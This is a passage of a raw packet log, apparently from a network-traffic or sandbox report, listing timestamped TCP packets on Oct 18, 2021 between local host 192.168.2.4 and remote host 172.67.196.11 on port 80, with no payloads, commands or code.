                                                                    Oct 18, 2021 08:02:35.370143890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370170116 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370172024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391576052 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391613007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391623974 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391638994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391659021 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391661882 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391683102 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391690016 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391702890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391724110 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391727924 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391745090 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391767025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391782045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391788960 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391801119 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391817093 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391828060 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391832113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391848087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391863108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391876936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391880989 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391885996 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391892910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391911030 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391932964 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391940117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391949892 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391972065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.391973019 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391983032 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.391993046 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392015934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392020941 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392038107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392057896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392071009 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392079115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392100096 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392117023 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392127037 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392132998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392148018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392159939 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392172098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392185926 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392199039 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392206907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392230034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392231941 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392234087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392281055 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392524958 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392551899 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392568111 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392586946 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392596006 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392605066 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392620087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392642975 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392647028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392663002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392677069 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392678022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392693043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392700911 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392710924 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392728090 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392739058 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392746925 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392760992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392776012 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392791033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392798901 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392813921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392817020 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392832041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392849922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392868042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392872095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392884016 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392895937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392899990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392910957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392923117 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392929077 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392945051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392960072 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392975092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.392982960 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.392991066 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393006086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393021107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393035889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393048048 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393052101 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393054962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393070936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393085957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393101931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393111944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393117905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393125057 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393156052 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393600941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393618107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393630028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393644094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393656015 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393666983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393678904 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393686056 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393692017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393703938 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393775940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393795967 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393816948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393837929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393860102 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393877029 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393882036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393883944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393902063 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393903971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393927097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393935919 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393949986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393970013 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.393975019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.393991947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394007921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394012928 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394023895 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394041061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394062042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394074917 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394084930 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394088030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394107103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394129992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394129992 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394153118 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394171000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394185066 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394186020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394202948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394207001 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394222021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394239902 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394256115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394263029 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394270897 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394287109 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394294977 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394313097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394484997 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394500971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394517899 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394532919 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394547939 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394562960 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394567013 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394577980 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394596100 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394603014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394613028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394619942 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394628048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394644022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394655943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394659042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394674063 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394687891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394690990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394704103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394714117 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394723892 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394740105 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394754887 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394769907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394784927 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394798994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394800901 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394814014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394828081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394834995 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394845963 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394857883 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394862890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394876957 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394877911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394893885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394908905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394911051 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394923925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394938946 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394941092 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394953966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394962072 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.394973040 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394989014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395003080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395011902 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395018101 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395032883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482389927 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482426882 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482428074 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482467890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482494116 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482506037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482543945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482553959 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482582092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482620001 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482656002 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482666969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482709885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482748985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482758999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482788086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482810020 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482825041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482861996 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482898951 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482898951 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482937098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482948065 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482985973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483027935 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483031034 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483066082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483104944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483130932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483170986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483206987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483230114 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483254910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483298063 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483306885 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483351946 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483403921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483414888 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483457088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483503103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483524084 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483557940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483606100 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483608007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483664036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483717918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483762026 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483767033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483814955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483818054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483867884 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483916998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483948946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483972073 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484026909 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484039068 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484087944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484149933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484152079 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484201908 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484249115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484293938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484297991 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484344959 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484378099 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484395027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484446049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484472990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484493971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484535933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484543085 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484574080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484611034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484644890 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484648943 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484684944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484709024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484723091 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484762907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484802008 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484811068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484853029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484859943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484889984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484927893 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.484962940 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.484966040 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485002041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485013008 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485039949 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485079050 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485088110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485132933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485158920 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485194921 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485198021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485236883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485248089 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485321999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485358000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485368967 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485395908 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485435963 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485454082 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485482931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485524893 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485549927 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485562086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485600948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485620022 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485637903 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485675097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485686064 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485717058 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485757113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.485786915 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.485804081 CEST8049816172.67.196.11192.168.2.4
